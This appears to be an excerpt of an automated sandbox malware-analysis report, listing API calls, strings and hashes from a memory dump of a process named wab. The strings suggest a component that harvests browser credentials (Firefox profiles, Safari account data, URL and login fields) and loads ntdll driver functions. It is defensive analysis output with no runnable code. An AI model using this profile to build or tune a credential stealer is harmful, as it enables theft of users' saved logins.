                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                    • String ID:
                                    • API String ID: 1828521557-0
                                    • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                    • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                    • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                    • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID:
                                    • API String ID: 2081463915-0
                                    • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                    • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                    • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                    • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                    APIs
                                      • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                    • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateErrorHandleLastRead
                                    • String ID:
                                    • API String ID: 2136311172-0
                                    • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                    • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                    • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                    • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                    APIs
                                      • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@??3@
                                    • String ID:
                                    • API String ID: 1936579350-0
                                    • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                    • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                    • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                    • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                    APIs
                                    • EmptyClipboard.USER32 ref: 004098EC
                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                    • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                    • GlobalFix.KERNEL32(00000000), ref: 00409927
                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                    • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                    • GetLastError.KERNEL32 ref: 0040995D
                                    • CloseHandle.KERNEL32(?), ref: 00409969
                                    • GetLastError.KERNEL32 ref: 00409974
                                    • CloseClipboard.USER32 ref: 0040997D
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                    • String ID:
                                    • API String ID: 2565263379-0
                                    • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                    • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                    • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                    • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                    APIs
                                    • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                    • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                    • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadMessageProc
                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                    • API String ID: 2780580303-317687271
                                    • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                    • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                    • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                    • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                    APIs
                                    • EmptyClipboard.USER32 ref: 00409882
                                    • wcslen.MSVCRT ref: 0040988F
                                    • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                    • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                    • memcpy.MSVCRT ref: 004098B5
                                    • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                    • CloseClipboard.USER32 ref: 004098D7
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                    • String ID:
                                    • API String ID: 2014503067-0
                                    • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                    • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                    • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                    • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                    APIs
                                    • GetLastError.KERNEL32 ref: 004182D7
                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                    • LocalFree.KERNEL32(?), ref: 00418342
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                      • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                      • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                    • String ID: OsError 0x%x (%u)
                                    • API String ID: 403622227-2664311388
                                    • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                    • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                    • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                    • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ??2@??3@memcpymemset
                                    • String ID:
                                    • API String ID: 1865533344-0
                                    • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                    • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                    • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                    • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                    APIs
                                    • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: NtdllProc_Window
                                    • String ID:
                                    • API String ID: 4255912815-0
                                    • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                    • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                    • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                    • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                    APIs
                                    • _wcsicmp.MSVCRT ref: 004022A6
                                    • _wcsicmp.MSVCRT ref: 004022D7
                                    • _wcsicmp.MSVCRT ref: 00402305
                                    • _wcsicmp.MSVCRT ref: 00402333
                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                      • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                    • memset.MSVCRT ref: 0040265F
                                    • memcpy.MSVCRT ref: 0040269B
                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                    • memcpy.MSVCRT ref: 004026FF
                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                    • API String ID: 577499730-1134094380
                                    • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                    • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                    • String ID: :stringdata$ftp://$http://$https://
                                    • API String ID: 2787044678-1921111777
                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                    • GetDC.USER32 ref: 004140E3
                                    • wcslen.MSVCRT ref: 00414123
                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                    • _snwprintf.MSVCRT ref: 00414244
                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                    • String ID: %s:$EDIT$STATIC
                                    • API String ID: 2080319088-3046471546
                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                    APIs
                                    • EndDialog.USER32(?,?), ref: 00413221
                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                    • memset.MSVCRT ref: 00413292
                                    • memset.MSVCRT ref: 004132B4
                                    • memset.MSVCRT ref: 004132CD
                                    • memset.MSVCRT ref: 004132E1
                                    • memset.MSVCRT ref: 004132FB
                                    • memset.MSVCRT ref: 00413310
                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                    • memset.MSVCRT ref: 004133C0
                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                    • memcpy.MSVCRT ref: 004133FC
                                    • wcscpy.MSVCRT ref: 0041341F
                                    • _snwprintf.MSVCRT ref: 0041348E
                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                    • SetFocus.USER32(00000000), ref: 004134B7
                                    Strings
                                    • {Unknown}, xrefs: 004132A6
                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                    • API String ID: 4111938811-1819279800
                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                    APIs
                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                    • EndDialog.USER32(?,?), ref: 0040135E
                                    • DeleteObject.GDI32(?), ref: 0040136A
                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                    • ShowWindow.USER32(00000000), ref: 00401398
                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                    • String ID:
                                    • API String ID: 829165378-0
                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                    APIs
                                    • memset.MSVCRT ref: 00404172
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                    • wcscpy.MSVCRT ref: 004041D6
                                    • wcscpy.MSVCRT ref: 004041E7
                                    • memset.MSVCRT ref: 00404200
                                    • memset.MSVCRT ref: 00404215
                                    • _snwprintf.MSVCRT ref: 0040422F
                                    • wcscpy.MSVCRT ref: 00404242
                                    • memset.MSVCRT ref: 0040426E
                                    • memset.MSVCRT ref: 004042CD
                                    • memset.MSVCRT ref: 004042E2
                                    • _snwprintf.MSVCRT ref: 004042FE
                                    • wcscpy.MSVCRT ref: 00404311
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                    • API String ID: 2454223109-1580313836
                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                    APIs
                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                    • memcpy.MSVCRT ref: 004115C8
                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                    • API String ID: 4054529287-3175352466
                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                    • API String ID: 3143752011-1996832678
                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                    APIs
                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
